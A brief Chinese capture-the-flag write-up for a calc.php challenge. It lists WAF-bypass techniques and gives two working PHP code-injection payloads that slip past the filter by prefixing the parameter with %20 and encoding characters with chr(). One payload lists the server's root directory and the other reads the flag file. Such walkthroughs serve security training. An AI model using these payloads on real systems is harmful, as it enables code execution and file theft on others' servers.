F12,注释已设置WAF,发现calc.php
查到可以通过以下方式绕过WAF:大小写混合,替换关键字,使用编码,使用注释,等价函数与命令,特殊符号,HTTP参数控制,缓冲区溢出,整合绕过
打开calc.php
过滤了一些字符和num
通过在num前面加表示空格的%20,用char()代替特殊字符的方式绕过
?%20num=var_dump(scandir(chr(47)))
发现flag,读取
?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
file_get_contents函数:把整个文件读入一个字符串中